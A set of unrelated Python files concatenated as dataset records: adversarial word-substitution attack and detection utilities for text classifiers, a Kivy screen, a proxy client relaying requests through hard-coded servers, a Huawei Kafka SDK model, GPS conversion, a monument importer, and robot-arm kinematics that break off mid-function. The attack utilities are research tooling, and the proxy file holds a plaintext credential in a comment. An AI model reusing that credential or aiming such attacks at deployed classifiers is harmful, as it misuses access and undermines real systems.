logger.log.info(\"Loading counter-fitted model for attack\")\n f = open(config.cf_path, \"r\")\n model = []\n model_dict = []\n idx = 0\n\n for line in f:\n row = line.strip().split(\" \")\n word = row[0]\n\n embedding = np.array([float(val) for val in row[1:]])\n model.append(embedding)\n model_dict.append(word)\n attack_dist_mat_word_to_idx[word] = idx\n attack_dist_mat_idx_to_word[idx] = word\n idx += 1\n\n logger.log.info(\"Done. {} words loaded!\".format(len(model)))\n logger.log.info(\"Compute {} dist mat\".format(config.dist_metric))\n\n if config.dist_metric == \"euclidean\":\n attack_dist_mat = sklearn.metrics.pairwise.euclidean_distances(model)\n else:\n attack_dist_mat = sklearn.metrics.pairwise.cosine_distances(model)\n\n logger.log.info(\"Attack dist mat shape {}\".format(np.shape(attack_dist_mat)))\n logger.log.info(\"Save attack mat\")\n\n np.save(config.path_to_attack_dist_mat, attack_dist_mat)\n save_pkl(\n attack_dist_mat_word_to_idx, config.path_to_attack_dist_mat_word_to_idx\n )\n save_pkl(\n attack_dist_mat_idx_to_word, config.path_to_attack_dist_mat_idx_to_word\n )\n\n logger.log.info(\"Saved attack mat\")\n else:\n logger.log.info(\n \"Load pre-computed attack mat from {}\".format(\n config.path_to_attack_dist_mat\n )\n )\n attack_dist_mat_word_to_idx = load_pkl(\n config.path_to_attack_dist_mat_word_to_idx\n )\n attack_dist_mat_idx_to_word = load_pkl(\n config.path_to_attack_dist_mat_idx_to_word\n )\n attack_dist_mat = np.load(config.path_to_attack_dist_mat)\n logger.log.info(\"Attack dist mat shape: {}\".format(np.shape(attack_dist_mat)))\n\n return attack_dist_mat, attack_dist_mat_word_to_idx, attack_dist_mat_idx_to_word\n\n\ndef compute_adversarial_word_overlap(adv_mods, detect_mods, logger):\n mods_idxs = set([i for (_, _, i) in adv_mods])\n t_mods_idxs = set([i for (_, _, i) in detect_mods])\n\n re_identified = (\n len(list(mods_idxs & t_mods_idxs)) / len(mods_idxs) if len(mods_idxs) > 0 else 0\n )\n\n pr_identified = (\n len(list(mods_idxs & t_mods_idxs)) / len(t_mods_idxs)\n if len(t_mods_idxs) > 0\n else 0\n )\n\n logger.log.info(\"Precision re-identified perturbed idxs: {}\".format(pr_identified))\n logger.log.info(\"Recall re-identified perturbed idxs: {}\".format(re_identified))\n\n return re_identified, pr_identified\n\n\ndef get_attack_data(config, data_module):\n if config.attack_train_set:\n attack_sequences = data_module.train_texts\n attack_pols = data_module.train_pols\n elif config.attack_val_set or config.tune_delta_on_val or config.detect_val_set:\n attack_sequences = data_module.val_texts\n attack_pols = data_module.val_pols\n else:\n attack_sequences = data_module.test_texts\n attack_pols = data_module.test_pols\n\n if config.limit > 0:\n attack_sequences = attack_sequences[: config.limit]\n attack_pols = attack_pols[: config.limit]\n\n return attack_sequences, attack_pols\n\n\ndef list_join(input_list):\n assert isinstance(input_list, list)\n return \" \".join(input_list)\n\n\ndef copy_file(config):\n copyfile(\n \"{}/config.py\".format(config.project_root_path),\n \"{}/config.py\".format(config.model_base_path),\n )\n\n\ndef get_oov_count(perturbed_indices, word_to_idx):\n oov = 0\n\n for (_, subst, _) in perturbed_indices:\n try:\n _ = word_to_idx[subst]\n except KeyError:\n oov += 1\n\n return oov\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":14395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"93980317","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat May 4 15:11:18 2019\n\n@author: georgiabaltsou\n\"\"\"\n\n#convert edge txt file to csv file appending also weight 1 to all edges\n\nimport csv\n\n\nwith open('lfrEdgelistExample.txt') as data_file: \n reader = csv.reader(data_file, delimiter=' ') \n with open('log.csv', 'w') as out_file:\n writer = csv.writer(out_file, delimiter=';') \n for row in reader:\n writer.writerow([row[0],row[1], 1])","sub_path":"txtToCsv.py","file_name":"txtToCsv.py","file_ext":"py","file_size_in_byte":524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"407367655","text":"from kivy.uix.screenmanager import Screen\nfrom kivy.uix.gridlayout import GridLayout\nfrom kivy.uix.button import Button\n\n\nclass PrehabScreen(Screen):\n def __init__(self, **kwargs):\n super(PrehabScreen, self).__init__(**kwargs)\n self.grid = GridLayout()\n self.grid.cols = 1\n self.grid.add_widget(Button(text=\"Back\"))\n\n self.add_widget(self.grid)","sub_path":"screens/prehab.py","file_name":"prehab.py","file_ext":"py","file_size_in_byte":382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"44435345","text":"#!/usr/bin/env python\n#\n# ______ _____ _ _ _\n# | ___ \\ / __ \\| |(_) | |\n# | |_/ / _ __ ___ __ __ _ _ | / \\/| | _ ___ _ __ | |_\n# | __/ | '__| / _ \\ \\ \\/ /| | | | | | | || | / _ \\| '_ \\ | __|\n# | | | | | (_) | > < | |_| | | \\__/\\| || || __/| | | || |_\n# \\_| |_| \\___/ /_/\\_\\ \\__, | \\____/|_||_| \\___||_| |_| \\__|\n# __/ |\n# |___/\n\nfrom http.server import BaseHTTPRequestHandler\nfrom http.server import HTTPServer\nimport urllib.request\nimport urllib.parse\n\nheaders = {}\nheaders ['User-Agent'] = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:71.0) Gecko/20100101 Firefox/71.0'\n\n# IP Proxy SQUID\n# proxy = {'http': 'EFFICOM:EFFICOM@142.93.230.147'}\nproxy = {'http': '142.93.230.147'}\n\nclass GetHandler(BaseHTTPRequestHandler):\n\tdef do_GET(self):\n\t\tparsed_path = self.path\n\n\t\t# Requete vers serveur proxy python\n\t\treq = urllib.request.Request('http://188.166.52.111/'+parsed_path, headers = headers)\n\n\t\t# Proxy SQUID\n\t\thandler = urllib.request.ProxyHandler(proxy)\n\t\topener = urllib.request.build_opener(handler)\n\t\turllib.request.install_opener(opener)\n\n\t\twith urllib.request.urlopen(req) as response:\n\t\t\tthe_page = response.read()\n\n\t\tself.send_response(200)\n\t\tself.end_headers()\n\t\tself.wfile.write(the_page)\n\n\nif __name__ == '__main__':\n\tserver = HTTPServer(('localhost', 8123), GetHandler)\n\tserver.serve_forever()\n\n\n","sub_path":"proxy/proxy_client.py","file_name":"proxy_client.py","file_ext":"py","file_size_in_byte":1491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"543707841","text":"# coding: utf-8\n\nimport six\n\nfrom huaweicloudsdkcore.utils.http_utils import sanitize_for_serialization\n\n\nclass ExtendProductPropertiesEntity:\n\n \"\"\"\n Attributes:\n openapi_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n sensitive_list = []\n\n openapi_types = {\n 'max_partition_per_broker': 'str',\n 'max_broker': 'str',\n 'max_storage_per_node': 'str',\n 'max_consumer_per_broker': 'str',\n 'min_broker': 'str',\n 'max_bandwidth_per_broker': 'str',\n 'min_storage_per_node': 'str',\n 'max_tps_per_broker': 'str',\n 'product_alias': 'str'\n }\n\n attribute_map = {\n 'max_partition_per_broker': 'max_partition_per_broker',\n 'max_broker': 'max_broker',\n 'max_storage_per_node': 'max_storage_per_node',\n 'max_consumer_per_broker': 'max_consumer_per_broker',\n 'min_broker': 'min_broker',\n 'max_bandwidth_per_broker': 'max_bandwidth_per_broker',\n 'min_storage_per_node': 'min_storage_per_node',\n 'max_tps_per_broker': 'max_tps_per_broker',\n 'product_alias': 'product_alias'\n }\n\n def __init__(self, max_partition_per_broker=None, max_broker=None, max_storage_per_node=None, max_consumer_per_broker=None, min_broker=None, max_bandwidth_per_broker=None, min_storage_per_node=None, max_tps_per_broker=None, product_alias=None):\n \"\"\"ExtendProductPropertiesEntity\n\n The model defined in huaweicloud sdk\n\n :param max_partition_per_broker: 每个Broker的最大分区数。\n :type max_partition_per_broker: str\n :param max_broker: Broker的最大个数。\n :type max_broker: str\n :param max_storage_per_node: 每个节点的最大存储。单位为GB。\n :type max_storage_per_node: str\n :param max_consumer_per_broker: 每个Broker的最大消费者数。\n :type max_consumer_per_broker: str\n :param min_broker: Broker的最小个数。\n :type min_broker: str\n :param max_bandwidth_per_broker: 每个Broker的最大带宽。\n :type max_bandwidth_per_broker: str\n :param min_storage_per_node: 每个节点的最小存储。单位为GB。\n :type min_storage_per_node: str\n :param max_tps_per_broker: 每个Broker的最大TPS。\n :type max_tps_per_broker: str\n :param product_alias: product_id的别名。\n :type product_alias: str\n \"\"\"\n \n \n\n self._max_partition_per_broker = None\n self._max_broker = None\n self._max_storage_per_node = None\n self._max_consumer_per_broker = None\n self._min_broker = None\n self._max_bandwidth_per_broker = None\n self._min_storage_per_node = None\n self._max_tps_per_broker = None\n self._product_alias = None\n self.discriminator = None\n\n if max_partition_per_broker is not None:\n self.max_partition_per_broker = max_partition_per_broker\n if max_broker is not None:\n self.max_broker = max_broker\n if max_storage_per_node is not None:\n self.max_storage_per_node = max_storage_per_node\n if max_consumer_per_broker is not None:\n self.max_consumer_per_broker = max_consumer_per_broker\n if min_broker is not None:\n self.min_broker = min_broker\n if max_bandwidth_per_broker is not None:\n self.max_bandwidth_per_broker = max_bandwidth_per_broker\n if min_storage_per_node is not None:\n self.min_storage_per_node = min_storage_per_node\n if max_tps_per_broker is not None:\n self.max_tps_per_broker = max_tps_per_broker\n if product_alias is not None:\n self.product_alias = product_alias\n\n @property\n def max_partition_per_broker(self):\n \"\"\"Gets the max_partition_per_broker of this ExtendProductPropertiesEntity.\n\n 每个Broker的最大分区数。\n\n :return: The max_partition_per_broker of this ExtendProductPropertiesEntity.\n :rtype: str\n \"\"\"\n return self._max_partition_per_broker\n\n @max_partition_per_broker.setter\n def max_partition_per_broker(self, max_partition_per_broker):\n \"\"\"Sets the max_partition_per_broker of this ExtendProductPropertiesEntity.\n\n 每个Broker的最大分区数。\n\n :param max_partition_per_broker: The max_partition_per_broker of this ExtendProductPropertiesEntity.\n :type max_partition_per_broker: str\n \"\"\"\n self._max_partition_per_broker = max_partition_per_broker\n\n @property\n def max_broker(self):\n \"\"\"Gets the max_broker of this ExtendProductPropertiesEntity.\n\n Broker的最大个数。\n\n :return: The max_broker of this ExtendProductPropertiesEntity.\n :rtype: str\n \"\"\"\n return self._max_broker\n\n @max_broker.setter\n def max_broker(self, max_broker):\n \"\"\"Sets the max_broker of this ExtendProductPropertiesEntity.\n\n Broker的最大个数。\n\n :param max_broker: The max_broker of this ExtendProductPropertiesEntity.\n :type max_broker: str\n \"\"\"\n self._max_broker = max_broker\n\n @property\n def max_storage_per_node(self):\n \"\"\"Gets the max_storage_per_node of this ExtendProductPropertiesEntity.\n\n 每个节点的最大存储。单位为GB。\n\n :return: The max_storage_per_node of this ExtendProductPropertiesEntity.\n :rtype: str\n \"\"\"\n return self._max_storage_per_node\n\n @max_storage_per_node.setter\n def max_storage_per_node(self, max_storage_per_node):\n \"\"\"Sets the max_storage_per_node of this ExtendProductPropertiesEntity.\n\n 每个节点的最大存储。单位为GB。\n\n :param max_storage_per_node: The max_storage_per_node of this ExtendProductPropertiesEntity.\n :type max_storage_per_node: str\n \"\"\"\n self._max_storage_per_node = max_storage_per_node\n\n @property\n def max_consumer_per_broker(self):\n \"\"\"Gets the max_consumer_per_broker of this ExtendProductPropertiesEntity.\n\n 每个Broker的最大消费者数。\n\n :return: The max_consumer_per_broker of this ExtendProductPropertiesEntity.\n :rtype: str\n \"\"\"\n return self._max_consumer_per_broker\n\n @max_consumer_per_broker.setter\n def max_consumer_per_broker(self, max_consumer_per_broker):\n \"\"\"Sets the max_consumer_per_broker of this ExtendProductPropertiesEntity.\n\n 每个Broker的最大消费者数。\n\n :param max_consumer_per_broker: The max_consumer_per_broker of this ExtendProductPropertiesEntity.\n :type max_consumer_per_broker: str\n \"\"\"\n self._max_consumer_per_broker = max_consumer_per_broker\n\n @property\n def min_broker(self):\n \"\"\"Gets the min_broker of this ExtendProductPropertiesEntity.\n\n Broker的最小个数。\n\n :return: The min_broker of this ExtendProductPropertiesEntity.\n :rtype: str\n \"\"\"\n return self._min_broker\n\n @min_broker.setter\n def min_broker(self, min_broker):\n \"\"\"Sets the min_broker of this ExtendProductPropertiesEntity.\n\n Broker的最小个数。\n\n :param min_broker: The min_broker of this ExtendProductPropertiesEntity.\n :type min_broker: str\n \"\"\"\n self._min_broker = min_broker\n\n @property\n def max_bandwidth_per_broker(self):\n \"\"\"Gets the max_bandwidth_per_broker of this ExtendProductPropertiesEntity.\n\n 每个Broker的最大带宽。\n\n :return: The max_bandwidth_per_broker of this ExtendProductPropertiesEntity.\n :rtype: str\n \"\"\"\n return self._max_bandwidth_per_broker\n\n @max_bandwidth_per_broker.setter\n def max_bandwidth_per_broker(self, max_bandwidth_per_broker):\n \"\"\"Sets the max_bandwidth_per_broker of this ExtendProductPropertiesEntity.\n\n 每个Broker的最大带宽。\n\n :param max_bandwidth_per_broker: The max_bandwidth_per_broker of this ExtendProductPropertiesEntity.\n :type max_bandwidth_per_broker: str\n \"\"\"\n self._max_bandwidth_per_broker = max_bandwidth_per_broker\n\n @property\n def min_storage_per_node(self):\n \"\"\"Gets the min_storage_per_node of this ExtendProductPropertiesEntity.\n\n 每个节点的最小存储。单位为GB。\n\n :return: The min_storage_per_node of this ExtendProductPropertiesEntity.\n :rtype: str\n \"\"\"\n return self._min_storage_per_node\n\n @min_storage_per_node.setter\n def min_storage_per_node(self, min_storage_per_node):\n \"\"\"Sets the min_storage_per_node of this ExtendProductPropertiesEntity.\n\n 每个节点的最小存储。单位为GB。\n\n :param min_storage_per_node: The min_storage_per_node of this ExtendProductPropertiesEntity.\n :type min_storage_per_node: str\n \"\"\"\n self._min_storage_per_node = min_storage_per_node\n\n @property\n def max_tps_per_broker(self):\n \"\"\"Gets the max_tps_per_broker of this ExtendProductPropertiesEntity.\n\n 每个Broker的最大TPS。\n\n :return: The max_tps_per_broker of this ExtendProductPropertiesEntity.\n :rtype: str\n \"\"\"\n return self._max_tps_per_broker\n\n @max_tps_per_broker.setter\n def max_tps_per_broker(self, max_tps_per_broker):\n \"\"\"Sets the max_tps_per_broker of this ExtendProductPropertiesEntity.\n\n 每个Broker的最大TPS。\n\n :param max_tps_per_broker: The max_tps_per_broker of this ExtendProductPropertiesEntity.\n :type max_tps_per_broker: str\n \"\"\"\n self._max_tps_per_broker = max_tps_per_broker\n\n @property\n def product_alias(self):\n \"\"\"Gets the product_alias of this ExtendProductPropertiesEntity.\n\n product_id的别名。\n\n :return: The product_alias of this ExtendProductPropertiesEntity.\n :rtype: str\n \"\"\"\n return self._product_alias\n\n @product_alias.setter\n def product_alias(self, product_alias):\n \"\"\"Sets the product_alias of this ExtendProductPropertiesEntity.\n\n product_id的别名。\n\n :param product_alias: The product_alias of this ExtendProductPropertiesEntity.\n :type product_alias: str\n \"\"\"\n self._product_alias = product_alias\n\n def to_dict(self):\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {}\n\n for attr, _ in six.iteritems(self.openapi_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\n value\n ))\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\") else item,\n value.items()\n ))\n else:\n if attr in self.sensitive_list:\n result[attr] = \"****\"\n else:\n result[attr] = value\n\n return result\n\n def to_str(self):\n \"\"\"Returns the string representation of the model\"\"\"\n import simplejson as json\n if six.PY2:\n import sys\n reload(sys)\n sys.setdefaultencoding(\"utf-8\")\n return json.dumps(sanitize_for_serialization(self), ensure_ascii=False)\n\n def __repr__(self):\n \"\"\"For `print`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, ExtendProductPropertiesEntity):\n return False\n\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n \"\"\"Returns true if both objects are not equal\"\"\"\n return not self == other\n","sub_path":"huaweicloud-sdk-kafka/huaweicloudsdkkafka/v2/model/extend_product_properties_entity.py","file_name":"extend_product_properties_entity.py","file_ext":"py","file_size_in_byte":12134,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"4771586","text":"import os\n\n\nlongitude ='1140.8688S'\nlatitude='02727.9781E'\naltitude='1212.9M'\n\n#convert dd mm.mmm to dd.ddd =dd +mm/60 +mmm/60\n\nnewLong = longitude\n\ncoord=newLong.split('.')\n\nmmmList=coord[1]\nprint(coord[1])\nmmm = mmmList[:-1]\n\nsigne=mmmList[-1:]\nddmm=list(coord[0])\nprint(''.join(ddmm[0:1]))\nif int(''.join(ddmm[0:1]))!=0:\n dd = ''.join(ddmm[0:2])\n mm = ''.join(ddmm[2:])\nelse:\n dd = ''.join(ddmm[1:3])\n mm = ''.join(ddmm[3:])\n\n\n\nprint(str(dd)+' '+str(mm)+' '+str(mmm)+' '+str(signe) +' len'+str(len(mmm)))\n\nconver =int(dd) + (int(mm)/60) +(int(mmm)/(60*(10** len(mmm))))\nif signe=='S' or signe=='W':\n conver *=-1\n\nprint(format(conver,'4f'))","sub_path":"myclasses/gpsd.py","file_name":"gpsd.py","file_ext":"py","file_size_in_byte":658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"99503950","text":"from Monument import Monument\nimport importer_utils as utils\n\n\nclass EeEt(Monument):\n\n def update_labels(self):\n name = utils.remove_markup(self.nimi)\n self.add_label(\"et\", name)\n\n def set_no(self):\n register_no = str(self.registrant_url.split(\"=\")[-1])\n self.add_statement(\"estonian_monument_id\", register_no)\n\n def set_adm_location(self):\n counties = self.data_files[\"counties\"]\n try:\n county_item = [x[\"item\"]\n for x in counties if x[\"et\"] == self.maakond]\n self.add_statement(\"located_adm\", county_item[0])\n except IndexError:\n return\n\n def __init__(self, db_row_dict, mapping, data_files, existing):\n Monument.__init__(self, db_row_dict, mapping, data_files, existing)\n self.update_labels()\n # self.exists(\"et\")\n self.set_commonscat()\n self.set_image(\"pilt\")\n self.set_coords((\"lat\", \"lon\"))\n self.set_no()\n self.set_adm_location()\n # self.exists_with_prop(mapping)\n self.print_wd()\n","sub_path":"importer/EeEt.py","file_name":"EeEt.py","file_ext":"py","file_size_in_byte":1078,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"113153787","text":"import numpy as np\nimport math\n\n\ndef convert_to_angular_velocities(velocities, theta_current, dt):\n velocities = np.matrix([[velocities[0]],\n [velocities[1]],\n [velocities[2]],\n [velocities[3]],\n [velocities[4]],\n [velocities[5]]])\n theta_current = np.matrix([[theta_current[0]],\n [theta_current[1]],\n [theta_current[2]],\n [theta_current[3]],\n [theta_current[4]],\n [theta_current[5]]])\n cartesian_pose, rotation_matrix = jaco_direct_kinematics(theta_current)\n next_cartesian_pose = cartesian_pose + velocities[0:3, 0] * dt\n euler_angles = rotationMatrixToEulerAngles(rotation_matrix)\n next_euler_angles = np.matrix(euler_angles).transpose() + velocities[3:6, 0] * dt\n next_rotation_matrix = eulerAnglesToRotationMatrix([next_euler_angles[0, 0],\n next_euler_angles[1, 0],\n next_euler_angles[2, 0]])\n\n next_theta, success = jaco_inverse_kinematics(theta_current, next_cartesian_pose, next_rotation_matrix)\n # print(next_cartesian_pose, \"next pose\")\n # print(np.unwrap(theta_current), \"theta_current\")\n # print(np.unwrap(next_theta), \"next_theta\")\n # print(np.subtract(np.unwrap(next_theta), np.unwrap(theta_current)), \"theta_diff\")\n # print(dt)\n angular_velocity = np.subtract(np.unwrap(next_theta), np.unwrap(theta_current)) / dt\n\n return angular_velocity\n\n\ndef get_jaco_jacobian(theta, a, d, alpha):\n\n theta1 = theta[0, 0]\n theta2 = theta[1, 0]\n theta3 = theta[2, 0]\n theta4 = theta[3, 0]\n theta5 = theta[4, 0]\n theta6 = theta[5, 0]\n\n a1 = np.matrix([[a[0, 0] * np.cos(theta1)],\n [a[0, 0] * np.sin(theta1)],\n [d[0, 0]]])\n a2 = np.matrix([[a[0, 1] * np.cos(theta2)],\n [a[0, 1] * np.sin(theta2)],\n [d[0, 1]]])\n a3 = np.matrix([[a[0, 2] * np.cos(theta3)],\n [a[0, 2] * np.sin(theta3)],\n [d[0, 2]]])\n a4 = np.matrix([[a[0, 3] * np.cos(theta4)],\n [a[0, 3] * np.sin(theta4)],\n [d[0, 3]]])\n a5 = np.matrix([[a[0, 4] * np.cos(theta5)],\n [a[0, 4] * np.sin(theta5)],\n [d[0, 4]]])\n a6 = np.matrix([[a[0, 5] * np.cos(theta6)],\n [a[0, 5] * np.sin(theta6)],\n [d[0, 5]]])\n\n Q1 = np.matrix([[np.cos(theta1), -np.cos(alpha[0, 0]) * np.sin(theta1), np.sin(alpha[0, 0]) * np.sin(theta1)],\n [np.sin(theta1), np.cos(alpha[0, 0]) * np.cos(theta1), -np.sin(alpha[0, 0]) * np.cos(theta1)],\n [0, np.sin(alpha[0, 0]), np.cos(alpha[0, 0])]])\n Q2 = np.matrix([[np.cos(theta2), -np.cos(alpha[0, 1]) * np.sin(theta2), np.sin(alpha[0, 1]) * np.sin(theta2)],\n [np.sin(theta2), np.cos(alpha[0, 1]) * np.cos(theta2), -np.sin(alpha[0, 1]) * np.cos(theta2)],\n [0, np.sin(alpha[0, 1]), np.cos(alpha[0, 1])]])\n Q3 = np.matrix([[np.cos(theta3), -np.cos(alpha[0, 2]) * np.sin(theta3), np.sin(alpha[0, 2]) * np.sin(theta3)],\n [np.sin(theta3), np.cos(alpha[0, 2]) * np.cos(theta3), -np.sin(alpha[0, 2]) * np.cos(theta3)],\n [0, np.sin(alpha[0, 2]), np.cos(alpha[0, 2])]])\n Q4 = np.matrix([[np.cos(theta4), -np.cos(alpha[0, 3]) * np.sin(theta4), np.sin(alpha[0, 3]) * np.sin(theta4)],\n [np.sin(theta4), np.cos(alpha[0, 3]) * np.cos(theta4), -np.sin(alpha[0, 3]) * np.cos(theta4)],\n [0, np.sin(alpha[0, 3]), np.cos(alpha[0, 3])]])\n Q5 = np.matrix([[np.cos(theta5), -np.cos(alpha[0, 4]) * np.sin(theta5), np.sin(alpha[0, 4]) * np.sin(theta5)],\n [np.sin(theta5), np.cos(alpha[0, 4]) * np.cos(theta5), -np.sin(alpha[0, 4]) * np.cos(theta5)],\n [0, np.sin(alpha[0, 4]), np.cos(alpha[0, 4])]])\n Q6 = np.matrix([[np.cos(theta6), -np.cos(alpha[0, 5]) * np.sin(theta6), np.sin(alpha[0, 5]) * np.sin(theta6)],\n [np.sin(theta6), np.cos(alpha[0, 5]) * np.cos(theta6), -np.sin(alpha[0, 5]) * np.cos(theta6)],\n [0, np.sin(alpha[0, 5]), np.cos(alpha[0, 5])]])\n Q = Q1 * Q2 * Q3 * Q4 * Q5 * Q6\n e1 = np.matrix([[0], [0], [1]])\n e2 = Q1 * e1\n e3 = Q1 * Q2 * e1\n e4 = Q1 * Q2 * Q3 * e1\n e5 = Q1 * Q2 * Q3 * Q4 * e1\n e6 = Q1 * Q2 * Q3 * Q4 * Q5 * e1\n r1 = a1 + Q1 * a2 + Q1 * Q2 * a3 + Q1 * Q2 * Q3 * a4 + Q1 * Q2 * Q3 * Q4 * a5 + Q1 * Q2 * Q3 * Q4 * Q5 * a6\n r2 = Q1 * a2 + Q1 * Q2 * a3 + Q1 * Q2 * Q3 * a4 + Q1 * Q2 * Q3 * Q4 * a5 + Q1 * Q2 * Q3 * Q4 * Q5 * a6\n r3 = Q1 * Q2 * a3 + Q1 * Q2 * Q3 * a4 + Q1 * Q2 * Q3 * Q4 * a5 + Q1 * Q2 * Q3 * Q4 * Q5 * a6\n r4 = Q1 * Q2 * Q3 * a4 + Q1 * Q2 * Q3 * Q4 * a5 + Q1 * Q2 * Q3 * Q4 * Q5 * a6\n r5 = Q1 * Q2 * Q3 * Q4 * a5 + Q1 * Q2 * Q3 * Q4 * Q5 * a6\n r6 = Q1 * Q2 * Q3 * Q4 * Q5 * a6\n\n E = np.matrix([[0, -1, 0], [1, 0, 0], [0, 0, 0]])\n s1 = np.matrix([[1], [0], [0]])\n s2 = np.matrix([[0], [1], [0]])\n s3 = np.matrix([[0], [0], [1]])\n EQ1 = E * Q\n EQ2 = Q1 * E * Q2 * Q3 * Q4 * Q5 * Q6\n EQ3 = Q1 * Q2 * E * Q3 * Q4 * Q5 * Q6\n EQ4 = Q1 * Q2 * Q3 * E * Q4 * Q5 * Q6\n EQ5 = Q1 * Q2 * Q3 * Q4 * E * Q5 * Q6\n EQ6 = Q1 * Q2 * Q3 * Q4 * Q5 * E * Q6\n\n R1 = np.concatenate((EQ1 * s1, EQ2 * s1, EQ3 * s1, EQ4 * s1, EQ5 * s1, EQ6 * s1), axis=1)\n R2 = np.concatenate((EQ1 * s2, EQ2 * s2, EQ3 * s2, EQ4 * s2, EQ5 * s2, EQ6 * s2), axis=1)\n R3 = np.concatenate((EQ1 * s3, EQ2 * s3, EQ3 * s3, EQ4 * s3, EQ5 * s3, EQ6 * s3), axis=1)\n\n Jacobian_temp_1 = np.concatenate((R1, R2, R3), axis=0)\n\n Jacobian_temp_2 = np.column_stack((np.cross(e1.getA1(), r1.getA1()),\n np.cross(e2.getA1(), r2.getA1()),\n np.cross(e3.getA1(), r3.getA1()),\n np.cross(e4.getA1(), r4.getA1()),\n np.cross(e5.getA1(), r5.getA1()),\n np.cross(e6.getA1(), r6.getA1())))\n\n jacobian = np.matrix(np.concatenate((Jacobian_temp_1, Jacobian_temp_2), axis=0))\n return jacobian, Q, s1, s2, s3, r1\n\n\ndef jaco_inverse_kinematics(theta_current, pose_goal, Q_goal):\n\n if theta_current is not np.matrix:\n theta_current = np.matrix(theta_current)\n if pose_goal is not np.matrix:\n pose_goal = np.matrix(pose_goal)\n if Q_goal is not np.matrix:\n Q_goal = np.matrix(Q_goal)\n if theta_current.shape != (6, 1):\n theta_current = theta_current.transpose()\n theta_output = theta_current\n theta_offset = np.matrix([[0], [-np.pi / 2], [np.pi / 2], [2 * np.pi], [np.pi], [np.pi]])\n theta = theta_current\n\n # Parametres physiques du robot Jaco\n D1 = 0.2755\n D2 = 0.41\n D3 = 0.2073\n D4 = 0.0743\n D5 = 0.0743\n D6 = 0.1687\n E2 = 0.0098\n\n # Parametres Intermediaires\n aa = 11 * np.pi / 72\n ca = (np.cos(aa))\n sa = (np.sin(aa))\n c2a = (np.cos(2 * aa))\n s2a = (np.sin(2 * aa))\n d4b = (D3 + (ca - c2a / s2a * sa) * D4)\n d5b = (sa / s2a * D4 + (ca - c2a / s2a * sa) * D5)\n d6b = (sa / s2a * D5 + D6)\n\n a = np.matrix([0, D2, 0, 0, 0, 0])\n d = np.matrix([D1, 0, -E2, -d4b, -d5b, -d6b])\n alpha = np.matrix([np.pi / 2, np.pi, np.pi / 2, 2 * aa, 2 * aa, np.pi])\n\n # #default values\n # Q = np.eye(3)\n # s1 = np.matrix([[1], [0], [0]])\n # s2 = np.matrix([[0], [1], [0]])\n # s3 = np.matrix([[0], [0], [1]])\n # r1 = np.matrix([[1], [0], [0]])\n\n # %XXXXXXXXXXXXXXXXXXXXXX PGI XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX\n # --- PARAMETRES DE LA FONCTION-----------------------------------------------------\n sample_time = 0.005\n erreur = 0\n epsilon = 10 ** -4\n max_loops = 10\n success = False\n # --- BOUCLE PRINCIPALE ------------------------------------------------------------\n for loops in range(max_loops):\n # not the \"usual\" jacobian we normally use for classic inverse kinematic resolutions.\n jacobian, Q, s1, s2, s3, r1 = get_jaco_jacobian(theta, a, d, alpha)\n #--- PERFORMANCE ACTUELLE - --------------------------------------------------------\n f = np.concatenate(((Q - Q_goal) * s1, (Q - Q_goal) * s2, (Q - Q_goal) * s3, r1 - pose_goal[0:3, 0]), axis=0)\n stop = np.max(np.abs(f)) < epsilon\n if stop:\n #we converged\n success = True\n return theta_output + theta_offset, success\n\n\n # adapted damped jacobian to avoid singularities\n Ek = np.matrix(np.divide(f.transpose() * f, 2.0))\n Wn = np.matrix(np.multiply(np.eye(6), Ek + 0.001))\n Hk = np.matrix(jacobian.transpose() * jacobian + Wn)\n jacobian_inv = Hk.I * jacobian.transpose()\n d_theta = jacobian_inv * f\n theta_output = theta_output - d_theta\n theta = theta_output\n return theta_output + theta_offset, success\n\n\ndef jaco_direct_kinematics(theta_actuators):\n\n if theta_actuators is not np.matrix:\n theta_actuators = np.matrix(theta_actuators)\n if theta_actuators.shape != (6,1):\n theta_actuators = theta_actuators.transpose()\n theta_offset = np.matrix([0, -np.pi / 2, np.pi / 2, 2 * np.pi, np.pi, np.pi])\n theta_actuators = np.subtract(theta_actuators, theta_offset.transpose())\n # Parametres physiques du robot Jaco\n D1 = 0.2755\n D2 = 0.41\n D3 = 0.2073\n D4 = 0.0743\n D5 = 0.0743\n D6 = 0.1687\n E2 = 0.0098\n\n # Parametres Intermediaires\n aa = 11 * np.pi / 72\n ca = (np.cos(aa))\n sa = (np.sin(aa))\n c2a = (np.cos(2 * aa))\n s2a = (np.sin(2 * aa))\n d4b = (D3 + (ca - c2a / s2a * sa) * D4)\n d5b = (sa / s2a * D4 + (ca - c2a / s2a * sa) * D5)\n d6b = (sa / s2a * D5 + D6)\n\n a = np.matrix([0, D2, 0, 0, 0, 0])\n d = np.matrix([D1, 0, -E2, -d4b, -d5b, -d6b])\n alpha = np.matrix([np.pi / 2, np.pi, np.pi / 2, 2 * aa, 2 * aa, np.pi])\n theta1 = theta_actuators[0, 0]\n theta2 = 